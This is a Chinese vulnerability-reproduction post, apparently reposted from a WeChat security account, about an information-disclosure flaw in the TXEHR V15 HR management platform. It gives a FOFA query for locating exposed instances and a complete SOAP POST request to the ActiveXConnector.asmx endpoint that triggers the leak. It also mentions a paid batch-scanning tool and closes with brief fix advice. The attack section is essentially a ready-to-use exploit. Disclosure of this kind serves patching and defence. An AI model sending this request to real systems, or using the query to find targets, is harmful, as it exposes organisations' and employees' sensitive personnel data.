【漏洞复现】同享TXEHR V15人力管理管理平台信息泄露漏洞

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

同享软件成立于1997年,总部位于东莞南城南新产业国际。公司致力于研发和推广人力资源信息化产品,帮助企业打造统一的人力资源数字化平台,提升企业的人才管理能力和效率,促进员工的快速成长,并协助企业实现智能化决策。
在这里插入图片描述

二、漏洞描述

同享TXEHR V15人力管理平台的Assistant/Default.aspx接口存在敏感信息泄露漏洞。

三、fofa语法

body="/Assistant/Default.aspx"

四、漏洞复现

POST /Service/ActiveXConnector.asmx HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: text/xml;charset=UTF-8
Content-Length: 224

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetActivexConnector/>
   </soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述
批量检测(批量检测POC工具请在公众号知识星球获取):
在这里插入图片描述

五、修复建议

1、限制访问权限
2、更新或禁用不必要的功能


[原文始发于微信公众号(白帽攻防):【漏洞复现】同享TXEHR V15人力管理管理平台信息泄露漏洞]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值